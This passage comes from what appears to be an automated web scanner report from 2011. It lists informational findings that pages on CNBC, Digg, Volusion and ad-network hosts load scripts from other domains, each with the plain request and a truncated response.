...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.24. http://data.cnbc.com/quotes/.GDAXI/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.GDAXI/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.GDAXI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109216
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.25. http://data.cnbc.com/quotes/.N225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.N225

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.N225 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:22 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109780
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.26. http://data.cnbc.com/quotes/.N225/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.N225/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/.N225/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:21 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 109182
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.27. http://data.cnbc.com/quotes/.SPX previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.SPX

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/.SPX HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:44 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 118794
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.28. http://data.cnbc.com/quotes/.SPX/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/.SPX/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/.SPX/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 118204
X-Aicache-OS: 64.210.194.245:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/stage/global.js" language="JavaScript"></script>
...[SNIP]...

20.29. http://data.cnbc.com/quotes/CN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/CN

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/CN;SHI HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.30. http://data.cnbc.com/quotes/CN previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/CN

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/CN;SHI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.31. http://data.cnbc.com/quotes/COMP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/COMP

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/COMP HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:08 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 113345
X-Aicache-OS: 64.210.194.246:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.32. http://data.cnbc.com/quotes/COMP/tab/2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/COMP/tab/2

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

GET /quotes/COMP/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:55 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Via: 1.1 C aicache6
Content-Length: 112765
X-Aicache-OS: 64.210.193.97:80
Connection: close
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html:html locale="true">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="refresh" content="300" />
<link rel="shor
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script language="javascript"
src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc">
<script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</div>
<script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.33. http://data.cnbc.com/quotes/HK previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.cnbc.com
Path:	/quotes/HK

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=171046
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/stage/global.js

Request

GET /quotes/HK;HSI/tab/2 HTTP/1.1
Host: data.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.34. https://deloitte.zettaneer.com/Subscriptions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://deloitte.zettaneer.com
Path:	/Subscriptions/

Issue detail

The response dynamically includes the following script from another domain:

https://edge.quantserve.com/quant.js

Request

GET /Subscriptions/ HTTP/1.1
Host: deloitte.zettaneer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 17:06:29 GMT
Connection: close
Content-Length: 16121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><t
...[SNIP]...
</script>

<script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.35. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js
http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</div>

<script src="http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js" type="text/javascript"></script>
...[SNIP]...

20.36. http://ecommerce-templates.volusion.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ecommerce-templates.volusion.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js
http://apis.google.com/js/plusone.js
http://platform.twitter.com/widgets.js
http://use.typekit.com/qdf0aoq.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: ecommerce-templates.volusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 17:07:16 GMT
Connection: close
Content-Length: 65626
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<meta property="fb:app_id" content="212091015497093" />
<script type="text/javascript" src="http://use.typekit.com/qdf0aoq.js"></script>
...[SNIP]...
<link type="text/css" href="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/themes/base/jquery-ui.css" rel="stylesheet" />

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<link href="/Content/Stylesheets/Templates.css" media="screen" rel="Stylesheet" type="text/css" />
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="//apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a>
<script src="//platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.37. http://edge.sapient.com/assets/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://edge.sapient.com
Path:	/assets/scripts/global.js

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/widgets.js

Request

GET /assets/scripts/global.js HTTP/1.1
Host: edge.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Aug 2011 14:09:36 GMT
Accept-Ranges: bytes
ETag: "010744be75ccc1:27e9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 57424
Cache-Control: max-age=62467
Date: Tue, 06 Sep 2011 15:32:21 GMT
Connection: close

.../*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nove
...[SNIP]...
</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...

20.38. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following scripts from other domains:

https://cts.w55c.net/ct/ct-4947e18d0acd4b329511c553466a8980.js
https://js.revsci.net/gateway/gw.js?csid=I10981&rtid=10158&auto=t

Request

Response

20.39. https://login.cnbc.com/cas/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.msn.com/library/dap.js

Request

Response

20.40. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc12059.247realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Issue detail

The response dynamically includes the following script from another domain:

https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx.ads/cvs/searchpage/L14/823358824/Top1/CVS/04_NOV_21270_Benefiber_V12/CVS_GENERALCATALOGPACKAGE_728X90_7.1_04_NOV_21270.html/4d686437616b356934616b41434d6658?

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=&z=8134664386

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:07:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 16:07:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=&z=4157733387"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:51:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:51:56 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382"><\/script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The response dynamically includes the following script from another domain:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=32696846=_4e663b96,0078175275,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=32696846/optn=64?trg=&z=0078175275

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:26:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:26:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

